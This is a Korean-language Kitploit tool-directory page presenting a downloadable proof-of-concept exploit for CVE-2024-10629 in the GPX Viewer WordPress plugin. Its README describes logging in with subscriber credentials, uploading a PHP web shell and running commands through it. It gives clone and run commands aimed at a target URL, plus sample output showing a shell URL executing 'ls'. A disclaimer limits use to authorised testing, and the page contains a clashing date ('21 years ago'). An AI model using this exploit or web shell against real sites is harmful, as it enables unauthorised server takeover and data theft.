Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-10629 — GPX Viewer <= 2.2.8 - 인증된 (구독자+) 임의 파일 생성 | Kitploit
도구/GitHubGitHub/nxploited/cve-2024-10629
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnxploited/cve-2024-10629

CVE-2024-10629

GPX Viewer <= 2.2.8 - 인증된 (구독자+) 임의 파일 생성

저장소 보기
21년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🛠️ GPX Viewer 익스플로잇 (CVE-2024-10629)

이 저장소는 WordPress용 GPX Viewer 플러그인의 개념 증명 익스플로잇을 포함합니다. 이 플러그인은 임의 파일 생성 취약점(CVE-2024-10629)에 취약합니다. 이 취약점을 통해 구독자 수준 이상의 인증된 공격자가 영향을 받는 사이트의 서버에 임의 파일을 생성할 수 있으며, 이로 인해 원격 코드 실행이 가능해질 수 있습니다.

📝 CVE 세부 정보

  • CVE ID: CVE-2024-10629
  • 게시일: 2024-11-13
  • 업데이트일: 2024-11-13
  • 취약한 플러그인: GPX Viewer <= 2.2.8
  • 취약점 유형: 인증된(Subscriber+) 임의 파일 생성
  • 점수: 8.8 HIGH
  • 심각도: HIGH
  • 버전: 3.1
  • 벡터 문자열: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

설명

WordPress용 GPX Viewer 플러그인은 버전 2.2.8 이하의 모든 버전에서 gpxv_file_upload() 함수에 기능 검사와 파일 유형 검증이 누락되어 임의 파일 생성에 취약합니다. 이로 인해 구독자 수준 이상의 인증된 공격자가 영향을 받는 사이트의 서버에 임의 파일을 생성할 수 있으며, 이는 원격 코드 실행을 가능하게 할 수 있습니다.

🚀 기능

  • 제공된 사용자 이름과 비밀번호를 사용한 자동 로그인.
  • GPX Viewer 플러그인 버전 확인.
  • PHP 셸을 서버에 업로드.
  • 셸 업로드 성공 확인.
  • 업로드된 셸을 통해 서버에서 명령 실행.

📚 사용법

사전 요구사항

  • Python 3.x
  • requests 라이브러리

익스플로잇 실행

  1. 저장소 복제:

    git clone https://github.com/Nxploited/CVE-2024-10629/
    cd CVE-2024-10629
    
  2. 필요한 라이브러리 설치:

    pip install requests
    
  3. 익스플로잇 실행:

    python exploit.py -u <target_url> -un <username> -p <password>
    

    <target_url>, <username>, <password>를 적절한 값으로 바꾸세요.

예시

python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password

출력

  • 스크립트는 플러그인 버전을 출력하고 취약한지 확인합니다.
  • 그런 다음 제공된 자격 증명을 사용하여 로그인하고 셸 업로드를 시도합니다.
  • 성공하면 셸 업로드를 확인하고 샘플 명령(ls)을 실행합니다.
[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...

예시 명령어

  • ls = 파일 표시
  • uname -a = 시스템 정보 표시

⚠️ 면책 조항

이 익스플로잇은 교육 목적과 승인된 테스트만을 위해 제공됩니다. 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 이 익스플로잇을 무단 사용하는 것은 불법이며 비윤리적입니다. 이 저장소의 작성자와 기여자는 이 익스플로잇으로 인한 오용이나 손해에 대해 책임을 지지 않습니다.


작성자: Khaled Alenazi (Nxploit)

도구 다운로드